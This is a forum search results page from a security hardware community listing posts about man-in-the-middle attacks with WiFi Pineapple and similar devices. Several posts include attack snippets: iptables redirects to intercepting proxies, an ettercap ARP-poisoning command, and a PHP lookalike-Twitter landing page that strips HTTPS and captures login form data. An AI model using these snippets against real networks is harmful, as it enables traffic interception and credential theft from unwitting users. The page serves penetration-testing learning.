Jump to content

Search the Community

Showing results for tags 'mitm'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Plunder Bug
    • Bash Bunny
    • Signal Owl
    • USB Rubber Ducky
    • Packet Squirrel
    • LAN Turtle
    • Screen Crab
    • Shark Jack
    • Key Croc
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 18 results

  1. Hello, I've been attempting to redirect port 80 to port 8080 using iptables v1.8.3 to test an SSL strip MITM attack. I've entered the command: iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080 upon entering it gives me the _error_: unknown option "--dport" it also doesn't recognize the "--to-port" option. I'm running Kali Linux on a Rasberry Pi 4B 4GB Does anyone know how I can resolve this? I haven't found anything useful on the web after three days of troubleshooting. cheers! -MichaelPV
  2. I have a payload idea for the packetsquirrel. The idea is to use the bashbunny or the rubberducky to install a certificate in a victims computer. Then deploy the packet squirrel to be able to decrypt all https traffic. I'm just wondering two things, first, does anybody know any decent mitm program that the packet squirrel can actually run? I have looked at bettercap but it runs on ruby so I'm unsure if it will work with the packet squirrel. I have also looked a bit into mitmproxy but I found the documentation vague. If it can't be run the packet squirrel, maybe you could connect the bashbunny to it to perform the mitm attack.
  3. Hi, I have a WiFi Pineapple Nano which I recently purchased with the intention of testing the following: Scenario: smart devices and a smart phone within a home environment, with apps on the smartphone used to manage these devices. All connected to GuestWiFi WLAN. I have a HomeWiFi WLAN which I connected my laptop and other computing devices too. Both WLANs use the same power line home extender service (TPLink) I wish to: 1) Use the Nano to sniff traffic on the GuestWiFi WLAN 2) Perform a MiTM by either creating a PineappleWiFi SSID and force all devices to connect to it, or fake/spoof the GuestWiFi. I updated the Nano to the latest firmware 2.5.4, and have connected it to a Macbook Pro 2018 via the USB (through a USB-C-to-USB adapter). The Nano also had a 32GB SD card so I can install modules on it. It's been assigned by myself on the Internet sharing interface and it is accessible (via Management portal on a browser and via SSH), and access the Internet (including resolving different websites). Recon works well, and I have put the smartphone and all connected devices in the allow MACs part, and the GuestWiFi in the allow SSID part in the Filters section. My issue lies in being able to do 1) (I must be missing something here) and 2). Re (1), I enabled WiFi client mode to connect to GuestWiFi but the problem is that it says enabling PineAP conflicts with wlan1 -> Is this a case of having to use GuestWiFi just in client mode (and not enabling PineAP) to satisfy (1)? In the case of (2), I enabled PineAP, and have Pineapple WiFi. Connecting the smartphone to it results in no Internet access (do I need to do IP forwarding?). Any help would be appreciated. Thanks and Regards,
  4. Hello , i bought new Wifi Pineapple NANO and i i've tried to install Ettercap module but i can not run it , and there is no log to check what is going on . is there any way to apply MITM attack on public network without forcing the clients to connect to my own evil AP , i want to spoof ARP and tcpdump all the traffic in nano sd. Thanks
  5. Hey Guys, with April fools coming up soon I want to try to make an nCage payload for the LanTurtle. For the uninitiated, "nCage" is a Chrome extension that replaces every picture in the web browser with a picture of Nick Cage. I swear I saw somewhere that there was a payload for the LanTurtle that replaced pictures in the browser with pictures of cats, so I figured I could modify that payload, but I couldn't find it. Is anyone familiar with a payload similar to that?
  6. Im having problems if my SSLsplit v1.1, it's unstable, i click start, but it don't start, or starts but immediately stops, or stop the internet connect. Any idea what i can do?
  7. ok so ive setup the nano with wp6 to share connection with kali, this all works spot on, then i connect to the nano with my phone, this is also fine, i fire up wireshark but only see traffic directed from, is this correct, i persumed i would be seeing the given IP from my phone? should the internet connection be coming from the nano or the laptop? what interface should i be sniffing? this is slightly baffling my brain but i know its so simple, to much eggnog i think, I know in a moment this will just click in my brain as i feel im putting way to much thought into such a simple process thanks all
  8. Hey guys, I've ran into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's php if there is a path specified in the URL that isn't "index.php" Example landing page code below, var_dump($_POST) on line 12 returns an empty array despite the form sending the data: <?php if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) { /* If not visiting twitter, redirect to non-HSTS twitter domain */ die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">'); } else { /* form posts to http://twitter.co.uk/sessions */ if(strstr($_SERVER['REQUEST_URI'], "/sessions")) { /* var_dump($_POST) returns an empty array, should print login data */ var_dump($_POST); die(); } /* Curl the site */ $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */ $result = str_replace('<script', "<div style='display:none'><!--", $result); $result = str_replace('</script', "--></div", $result); echo $result; } ?> if I make the form post to http://twitter.co.ukdirectly, without the /session - they are accessible from the landing page, but I would really like to be able to access them even with other filepaths.
  9. Hi everyone, I use the Wi-Fi pineapple as a man in the middle Device Redirecting all traffic to a Laptop That the Wi-Fi pineapple is tethered to, Similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/ So here's my setup, MacBook running linux VM (Virtual box) Connected via USB To the Wi-Fi pineapple That's sending all traffic To the virtual box Machine : Pardon my diagram skills :( Here describe that I have created Based off of the post Above, HoweverI don't think this is ideal since you would need to ssh into the pineapple to run this script every time. Ideally it would be best to do this via the web interface of the pineapple via a simple "enable proxy" button etc. Any feedback would be appreciated. #!/bin/bash if [[ $# -eq 0 ]] ; then echo "Usage: $0 (enable|disable)" exit 1 fi action="$1" case $action in enable) echo "Enabling ..." iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination iptables -t nat -A POSTROUTING -j MASQUERADE ;; disable) echo "Disabling ..." iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination ;; *) echo "Usage: $0 (enable|disable)" exit 1 ;; esac
  10. Hi Everyone! I am trying to achieve this scenario : connect client to management AP, gets IP address from pineapple. PC on same pine network has same subnet address of I want to be able to forward all traffic from the client device onto the PC which is running burpsuite. I have tried almost every thread that i can find and whatever i do i cannot get this traffic from the device through burpsuite. is it actually possible to do this? as in a client connects to the pineapple network and then the traffic is passed through to burpsuite? My set up in burpsuite was to look at all interfaces on port 8080. Then i tried the specific address of the burp PC with 8080 but still no traffic coming through. The only was i have got it to work slightly is by configuring the client device to use a proxy which directs straight to the PC using burp. This then causes problems about SSL connections failing (which i expected, but was worth a long shot) i then started to run ssl strip on pineapple to try and see if that would help, but no, the webpages would not load due to the SSL connections failed. When i do proxy straight through to the PC running burp the websites again, do not load and i am stuck with a loading screen for whatever im using. Obviously this isn't ideal and im hoping to use this in a presentation coming up very soon. I have been ripping my hair out over this for about a week now... surely it not this hard!! ANy help would be appreciated, mainly getting traffic flowing from pineapple to burp! THANKS!!!! w
  11. After using MITMf for a while on my Kali Linux machine, I'm wondering whether it would be feasible to use it on a Bash Bunny. You'd have to be able to pull things like the gateway and DNS server automatically, but beyond that the only problem I can think of is the complex dependencies for MITMf. Thoughts?
  12. Hey all, The Tetra allows us to do so many great things. We can spoof the SSID and make a Client think they are connecting to a "known" AP. The Client has the WPA2 password stored to automatically connect to its "known" AP. Why can't we spoof the SSID (and MAC if necessary) but also prompt for a passkey (WEP/WPA/WPA2 depending on the legitimate AP) and sniff the passkey that the Client sends? I have a feeling the issue has to do with hashing done at each sides of the 4-way handshake. It just seems like we should be able to MitM some of this. Appreciate anyones input and teaching my like i'm 5 If the answer is something like "we do see all the hashes, which is why you then have to brute force/dictionary them to turn to clear text", then why are we unable to "pass the hash" with Wifi.
  13. Hi guys! I recently wanted to get interrested in deploying a MITM attack in my home network. I firstly used SSLSplit and ettercap from the Pineapple Web Interface (which is a little bit buggy sometimes). From there, the attack worked 1/3 of the time. Then I tried to do this from the CLI. ettercap seems to work pretty well (ettercap -Tqi wlan1 -M arp:remote // //) but I didn't managed to get SSLStrip working... And if I try to run SSLStrip from the GUI, the certs are signed by "SSLStrip", which cause security warnings. Is there a way to generate customs certs and pass them to the SSLStrip GUI? Thanks! PS: I observed that when the attack is going on, it's really slow to browse the internet... Is it normal? Sorry for my bad english
  14. Hallo, I have one question about the Lan Turtle. When i connect the Lan turtle in a PC from a "big" network so the lan turtle has acces to the network, doesnt it? When i want to start a MITM attack, have the target device only be in the same network or should i connect the lan turtle directly to the targetet device? So for example i plug in the lan turtle in "PC206" and i want to attack the "PC259" does it works or should i plug in the turtle in PC259? I Hope you understand my question :) Thanks in advice, Simon PS: sorry for my bad englisch, im not a native speaker
  15. Hello, I was wondering what are the different techniques you guys use for a man in the middle attack. Just for something to learn and advance on. Thanks.
  16. I am completely and utterly disappointed. i have been searching for weeks to find out how to preform a arp-poising MITM attack to sniff plain text credentials, the best thing i could find was Responder. There is no guide on how to use this explicitly on the WiFi Pineapple. I have basically paid $250 for a box. The last person to ask about this did not get anywhere in terms of help either. Please Can somebody in this entire forum show me how i can configure Responder to work on a Wireless network. Like from the ground level. What options do i select, do i connect in client mode (Wlan1, Wlan0) ect. Please, this was a big investment for me.
  17. Hello Wonderful People, So I'm hitting a snag with an attack I'm trying to carry out and could really use anyone's help trying to troubleshoot this. I've got the theory down and get half way but can't seem to jump the last hurdle. So here's the jist, I'm trying to MitM devices connecting to my TETRA using Burp Suite to capture any HTTP or HTTPS traffic so that I can observe/modify (you know the drill) the HTTP/S traffic. Thing is, I can capture the traffic and MitM successfully with the TETRA (I am able to see all traffic passing through my attack machine within Wireshark). However, I can't seem to get that traffic into Burp. I'm only interested in sending HTTP/S traffic to Burp, all other traffic can head on out to the Internet. I've tried using iptables rules to preroute the traffic bound for dport 80 or 443 to the Burp Proxy listening on 8080 (and tried individual listeners on 80 and 443 to no avail), but no traffic seems to get to it... well to an extent. If I grab the HTTP header of google.com whilst routing traffic to Burp, I can grab a HTTP header for Burp itself. Here's a diagram because I like making them: Attackers IP (Eth1) is Eth0 IP is (LAN has Internet connectivity via gateway at ETH0 and 1 are wired (I wire into the ETH port of my TETRA). Mobile devices are connecting via WiFi (PineAP). It's simple enough in my head, have all traffic coming in over ETH1 that is destined for 80 ro 443 re-route to the Burp Listener... but it doesn't seem to work correctly. Here's the iptables rules I was creating to try and route the traffic (applied on the attackers machine): iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to And ip forwarding is enabled on the attackers machine with: sysctl net.ipv4.ip_forward=1 I'm still trying out stuff, next thing is to route HTTP/S traffic from ETH1 to LO (seeing as the listener is on LO, but I know from previous posts their are legends on these forums and would appreciate some pokes in the right direction if anyone has any ideas. And yes, I did look around the forums and on the Internet, but I can't seem to find the thing that works. Any thoughts are welcome. Think this might be a cool addition to the forums if we can get it going. Thanks.
  18. Hey everyone, I am wondering if you guys have any specific steps you take once you are the MITM? What kind of things are you trying to do with the packets? Push java applets to clients? Use Karmetaspolit? Since SSLStrip is no longer working, what types of things are you doing to gaurentee the most data out of your "victims". I am particularly intrested in emails, social media, etc... Assuming its been approved by the client I am auditing. I really want to show some examples of what can go wrong for a client site when a MITM attack is successfully executed using the pineapple, any ideas?
  • Create New...